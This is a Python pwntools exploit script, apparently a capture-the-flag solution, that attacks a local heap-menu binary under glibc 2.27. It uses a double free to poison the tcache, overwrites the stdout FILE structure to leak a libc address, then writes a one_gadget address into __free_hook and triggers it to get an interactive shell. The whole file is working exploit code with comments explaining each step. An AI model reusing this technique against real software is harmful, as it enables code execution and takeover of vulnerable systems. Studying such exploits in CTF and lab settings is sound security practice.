from pwn import *
# Target binary plus the exact glibc 2.27 build it is exercised against.
# Running under that build's loader with LD_PRELOAD pins libc, which is
# what keeps the hard-coded offsets further down valid.
context.log_level = 'debug'

elf = ELF('./pwn')
libc = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
ld = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so')

# Build-specific constants: `one` presumably holds one_gadget-style libc
# offsets, `stdout` the address of the binary's stdout pointer slot
# (non-PIE, so it is fixed). Neither carries over to another libc or
# binary build without re-deriving it.
one = [0x4f2c5, 0x4f322, 0x10a38c]
stdout = 0x602020

io = process(argv=[ld.path, elf.path], env={'LD_PRELOAD': libc.path})
def login():
    """Answer the target's username/password prompts with the fixed credentials."""
    creds = (('username:', 'admin'), ('password:', 'frame'))
    for prompt, answer in creds:
        io.sendlineafter(prompt, answer)
def add(name, size, con, ch=1):
    """Drive menu option 1 (create): send *name*, *size* and content *con*.

    *ch* chooses which form of the menu prompt to wait for: 1 waits for
    '>\n' (prompt followed by a newline), any other value waits for a bare
    '>'. *con* is sent raw (no trailing newline) after the prompt that
    ends in 'tion:'.
    """
    menu_prompt = '>\n' if ch == 1 else '>'
    io.sendlineafter(menu_prompt, '1')
    io.sendafter('name:', name)
    io.sendlineafter('size:', str(size))
    io.sendafter('tion:', con)
def dele(idx, ch=1):
    """Drive menu option 2 (delete) for entry *idx*.

    *ch* selects the menu prompt form exactly as in add(): 1 waits for
    '>\n', anything else for a bare '>'.
    """
    menu_prompt = '>\n' if ch == 1 else '>'
    io.sendlineafter(menu_prompt, '2')
    io.sendlineafter('index:', str(idx))


# Authenticate, then create entry 0 requesting a 0x60-byte buffer.
login()
add('0', 0x60, 'aaaa')
# Delete entry 0 twice. Accepting a second delete of the same index is the
# target's bug: the same chunk enters the allocator's freelist twice
# (a libc 2.29+ tcache would abort on this; 2.27 does not check).
for _ in range(2):
    dele(0)

# Re-allocating the doubly-freed chunk and writing a pointer into it
# presumably redirects the freelist, so entry 3 is handed out at `stdout`
# (the binary's stdout pointer slot). The single byte 0x60 written there
# looks intended to leave the stored pointer's low byte unchanged, so the
# allocation after it lands on the FILE struct itself.
add('1', 0x60, p64(stdout))
add('2', 0x60, 'aaaa')
add('3', 0x60, '\x60')

# Entry 4's content overwrites the start of that FILE struct: a new
# `_flags` value, three zeroed pointers, then a one-byte partial overwrite
# of the following pointer field. The next flush of stdout then emits
# libc memory instead of buffered program output.
fake_stdout = p64(0xfbad1800) + p64(0) * 3 + p8(8)
add('4', 0x60, fake_stdout)

# The first 8 bytes that come back are read as a libc pointer; 0x3ed8b0
# (4118704) is its hard-coded distance from libc's base for this build.
# NOTE(review): confirm against libc.sym if the libc file ever changes.
LEAK_OFFSET = 0x3ed8b0
libc_base = u64(io.recvn(8)) - LEAK_OFFSET
free_hook = libc_base + libc.sym['__free_hook']

# Same double-delete pattern on the 0x50 size class, this time aiming the
# freelist at __free_hook so entry 8's content is written there. The
# final delete then goes through the hook. ch=2 because the menu prompt
# no longer ends with a newline once stdout's buffering was altered.
one_gadget = libc_base + one[1]
add('5', 0x50, '???', 2)
for _ in range(2):
    dele(5, 2)
add('6', 0x50, p64(free_hook), 2)
add('7', 0x50, 'aaaa', 2)
add('8', 0x50, p64(one_gadget), 2)

dele(5, 2)
io.interactive()